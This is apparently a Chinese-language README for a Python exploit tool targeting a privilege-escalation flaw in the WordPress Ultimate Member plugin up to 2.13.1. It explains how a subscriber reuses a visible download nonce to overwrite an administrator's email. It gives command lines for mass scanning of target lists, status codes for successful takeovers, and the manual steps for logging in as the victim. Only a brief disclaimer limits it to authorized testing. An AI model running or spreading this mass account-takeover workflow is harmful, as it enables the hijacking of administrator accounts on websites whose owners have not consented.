WordPress Ultimate Member 插件 <= 2.13.1 - 权限提升漏洞
Ultimate Member <= 2.13.1 — 权限提升 / 账户接管
📌 官方记录:CVE-2026-96451
来自 CVE.org:
Ultimate Member 中的通过用户控制密钥绕过授权漏洞允许权限提升。此问题影响 Ultimate Member:从 n/a 到 2.13.1。
| 字段 | 值 |
|---|---|
| 🆔 CVE | CVE-2026-96451 |
| 🏷️ CWE | CWE-639 — 通过用户控制密钥绕过授权 |
| 📊 CVSS 3.1 | 8.8 HIGH AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| 🏢 分配者 | Patchstack |
| ⚠️ 受影响 | Ultimate Member 至 2.13.1 |
| ✅ 已修复 | 2.14.0 |
已登录的订阅者可以更改另一个用户(通常是管理员)的电子邮件。随后 WordPress 会接受发送到该新邮箱的密码重置请求。
um_fetch_user($user_id) 并将全局用户切换为 URL 中的 ID。download_routing() 会返回,而不会调用 um_reset_user()。_um_account=1、user_email=...)。account_submit() 读取 um_user('ID') —— 此时为受害者 —— 并写入新的电子邮件。下载 nonce 为 wp_create_nonce($user_id . $form_id . 'um-download-nonce')。它绑定到该用户 ID,无法凭空构造。脚本会从可见的 /um-download/{form}/{field}/{user}/{nonce}/ 链接中复制它。
必须在个人资料上显示自定义的 file 或 image 字段。内置的个人资料/封面照片不会产生此链接。
pip install requests rich
注册、登录、nonce 收集、利用和重置检查都是自动的。你无需手动创建账户,也无需为批量扫描传递订阅者密码。
python CVE-2026-96451.py -l targets.txt -t 80 --email "[email protected]" -o um_takeover.txt
此命令在每个主机上执行的操作:
/account//um-download/ nonce(优先用户 ID 1,然后是任何拥有文件的成员)--emailwp-login.php?action=lostpassword(WordPress 在此处不需要 nonce)um_takeover.txt--email 是放置在目标账户上的邮箱,以便你可以接收重置邮件。脚本不会打开收件箱或设置新密码。最后一步需要手动完成。
python CVE-2026-96451.py -u "https://example.com" --email "[email protected]"
| 标志 | 用途 | 默认值 |
|---|---|---|
-l / --list | 目标文件 | — |
-u / --url | 单个目标 | — |
-t / --threads | 工作线程数 | 10 |
-o / --output | 结果文件 | um_takeover.txt |
--email | 写入受害者账户的邮箱 | 自动生成 |
--target-id | 首选用户 ID | 1 |
--user / --password | 使用现有订阅者而非注册 | 关闭 |
-v / --verbose | 打印每个阶段 | 关闭 |
在较慢的 RDP 机器上,80–150 个线程就足够了。列表扫描为每个主机分配约 22 秒。
[5400/11965] RST:0 CHG:0 UM:4463 REG:589 rf:3874 lf:0 na:141 nd:448 nc:0 no:937
| 代码 | 含义 |
|---|---|
RST / CHG | 电子邮件已更改和/或重置已接受 — 检查收件箱 |
UM | 检测到 Ultimate Member |
REG | 自动注册创建了会话 |
rf | 无公开表单、CAPTCHA、审批或电子邮件激活 |
lf | 已注册但登录失败 |
na | 账户页面 / nonce 缺失 |
nd | 无可见的下载 nonce(无自定义文件字段) |
nc | 已发送利用,更改未确认 |
no | 不是 Ultimate Member |
在许多主机上出现 REG_FAIL 是正常的。该链条仅在注册创建了会话并且下载链接可见的地方继续。
当出现 RST 或 CHG 时:
--email 的邮箱/wp-login.php 或 /wp-admin/ 登录本项目仅用于授权的安全研究 —— 你拥有或已获得书面许可进行测试的系统。
未经授权访问计算机系统是非法的。作者对滥用、损害或本软件的任何后果不承担任何责任。你对如何使用它以及扫描的每个目标负全部责任。
作者:Nxploited ( Khaled Alenazi )